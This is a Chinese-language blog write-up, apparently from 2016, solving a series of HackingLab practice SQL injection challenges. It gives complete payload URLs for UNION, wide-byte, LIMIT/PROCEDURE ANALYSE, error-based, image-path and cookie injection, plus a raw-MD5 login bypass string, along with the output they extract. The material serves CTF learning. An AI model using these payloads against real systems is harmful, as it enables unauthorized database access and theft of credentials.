MENU

HackingLab 注入关 writeup

June 29, 2016 • Read: 6222 • CTF

0x01 最简单的SQL注入

Tips题目里有简单提示
通关地址

万能密码直接秒。

admin' or 'a'='a
密码随便
登录成功!我的座右铭(flag)是iamflagsafsfskdf11223

0x02 最简单的SQL注入(熟悉注入环境)

最简单的SQL注入
通关地址

经典的mysql注入。

//order by
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2+ORDER+BY+3
//union select 看显示位
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2+and+1=2+UNION+ALL+SELECT+1,2,3
//看数据库
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2 and 1=2 union select 1,schema_name,3 from information_schema.schemata
//当前数据库 mydbs
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2 and 1=2 union select 1,2,database()
//列表名 sae_user_sqli3
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema=0x6d79646273
//查字段名 id, title, content
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2 and 1=2 union select 1,2,column_name from information_schema.columns where table_name=0x7361655f757365725f73716c6933 and table_schema=0x6d79646273
//读内容 flagishere# HKGGflagdfs56757fsdv
http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2 and 1=2 union select 1,title,content from mydbs.sae_user_sqli3

0x03 防注入

小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!
通关地址
flag是随机序列

常用的检测都不行,后来发现有宽字节报错,应该是宽字节注入了。

//宽字节出现报错
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%bf'
//order by 列数3,记得后面加个#
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%df%27%20order%20by%204%23
//当前数据库 mydbs
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%df%27%20union%20select%201,2,database()%23
//列表名 sae_user_sqli4
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%df%27%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%23
//查字段名 id,title_1,content_1
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%df%27%20union select 1,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7361655f757365725f73716c6934%20and%20table_schema=0x6d79646273%23
//读内容 my blog test,easy ,Hsaagdfs56sdf7fsdv,flag is here!
http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=3%df%27%20union%20select%201,group_concat%28title_1%29,group_concat%28content_1%29%20from%20mydbs%2esae_user_sqli4%23

0x04 到底能不能回显

小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢?
通关地址

根据题目的提示,注入点在limit条件中,看到一篇文章

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。
//看下版本
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)%23&num=1
//数据库 mydbs 表 article, user,
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,table_name,0x3f) from information_schema.tables where table_schema=0x6d79646273 limit 0,1))),1)%23&num=1
//读字段名 article表id, title, user, contents, isread; user表id, username, password, lastloginIP;
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,column_name,0x3f) from information_schema.columns where table_name=0x61727469636c65 and table_schema=0x6d79646273 limit 0,1))),1)%23&num=1
//读内容 flag:myflagishere
http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(0x3a,(select distinct concat(0x3f,username,0x3a,password,0x3f) from mydbs.user limit 2,1))),1)%23&num=1

0x05 邂逅

小明今天出门看见了一个漂亮的帅哥和漂亮的美女,于是他写到了他的日记本里。
通关地址

在 90sec 上看到一篇帖子,终于知道怎么做了,原来是图片注入,但是回显没有在浏览器里,怪不得我当初没发现,用 Burp 抓包就能看到了,还是宽字节注入。

//报错
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%bf' HTTP/1.1
//order by 5 报错,共有4个字段
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20order%20by%205%23 HTTP/1.1
//看显示位,3
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20union%20select%201,2,3,4%23 HTTP/1.1
//当前数据库 mydbs
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1
//看表名 article pic
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%23 HTTP/1.1
//看字段 article表id,title,content,others  pic表id,picname,data,text
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=0x61727469636c65%23 HTTP/1.1
//查看picname dog1.jpg,cat1.jpg,flagishere_askldjfklasjdfl.jpg
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/cat1.jpg%df%27%20union%20select%201,2,group_concat(picname),4%20from%20pic%23 HTTP/1.1

到那张图片里去拿到 flag。

1.jpg

0x06 ErrorBased

本题目为手工注入学习题目,主要用于练习基于Mysql报错的手工注入。Sqlmap一定能跑出来,所以不必测试了。flag中不带key和#
通关地址

考察报错注入,可以看这篇文章

//看数据库版本 5.1.73
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//看当前用户 [email protected]
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//当前数据库 mydbs
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//爆库 information_schema, mydbs, test
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//爆表 log, motto, user
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//爆字段 id, username, password
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x75736572 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
//读内容
http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin' and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM user limit 0,1)))%23
//发现user表没有flag,读motto表
key#notfound!#

0x07 盲注

今天我们来学习一下盲注.小明的女朋友现在已经成了女黑阔,而小明还在每个月拿几k的收入,怎么养活女黑阔...........so:不要偷懒哦!
通关地址

直接用 sqlmap 就可以跑出来了,虽然比较慢。

0x08 SQL注入通用防护

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!
通关地址

GET/POST 都过滤了,那就是 cookie 了,抓个包,用 sqlmap 即可跑出来。

也可以用手工注入,原本的 cookies 只有一条,在后面加一个 ;id=1' 即可报错。

0x09 据说哈希后的密码是不能产生注入的

代码审计与验证
通关地址

点开地址,可以看到一段源码。

<?php



include "config.php";


if(isset($_GET['userid']) && isset($_GET['pwd'])){

    $strsql="select * from `user` where userid=".intval($_GET['userid'])." and password='".md5($_GET['pwd'], true) ."'";
    
    $conn=mysql_connect($dbhost,$username,$pwd);
    mysql_select_db($db,$conn);
    $result=mysql_query($strsql);
    print_r(mysql_error());
    $row=mysql_fetch_array($result);
    mysql_close($conn);
    echo "<pre>";
    print_r($row);
    
    echo "</pre>";
    if($row!=null){
        echo "Flag: ".$flag;
    }
    
}
else{
    echo "PLEASE LOGINT!";
}
echo "<noscript>";
echo file_get_contents(__FILE__);

可以看到 useridintval 处理过了,应该是没有办法注入,pwd 有一个 md5 转换的过程,结合题目名称,突破点应该就在这里了。

这道题之前就做过了,参见之前的文章,有一个 payload 直接就可以用。

http://lab1.xseclab.com/code1_9f44bab1964d2f959cf509763980e156/?userid=1&pwd=129581926211651571912466741651878684928
//拿到 flag
Array
(
    [0] => 1
    [userid] => 1
    [1] => aaaaaaaaaaa
    [password] => aaaaaaaaaaa
)
Flag: FsdLAG67a6dajsdklsdf

这道题出现注入的原因是因为 md5 函数开启了 raw_output参考链接

The trick: Raw MD5 hashes are dangerous in SQL
The trick in this challenge was that PHP’s md5() function can return its output in either hex or raw form. Here’smd5()’s method signature:

string md5( string $str [, bool $raw_output = false] )

If the second argument to MD5 is true, it will return ugly raw bits instead of a nice hex string. Raw MD5 hashes are dangerous in SQL statements because they can contain characters with special meaning to MySQL. The raw data could, for example, contain quotes (' or ") that would allow SQL injection.

虽然我没看懂他跑出这个 payload 的原理,不过。。。能用就行。

另外,我在 90sec 上也看到一篇文章,其中提到,用 ffifdyop 这个 payload 也可以,原因不明。

Last Modified: February 15, 2017
Archives QR Code
QR Code for this page
Tipping QR Code
Leave a Comment

2 Comments
  1. hou hou

    为什么第一个我按照你得输入登录失败或者vcode error

  2. script script

    最近实验吧网站的 数据库好像挂了。。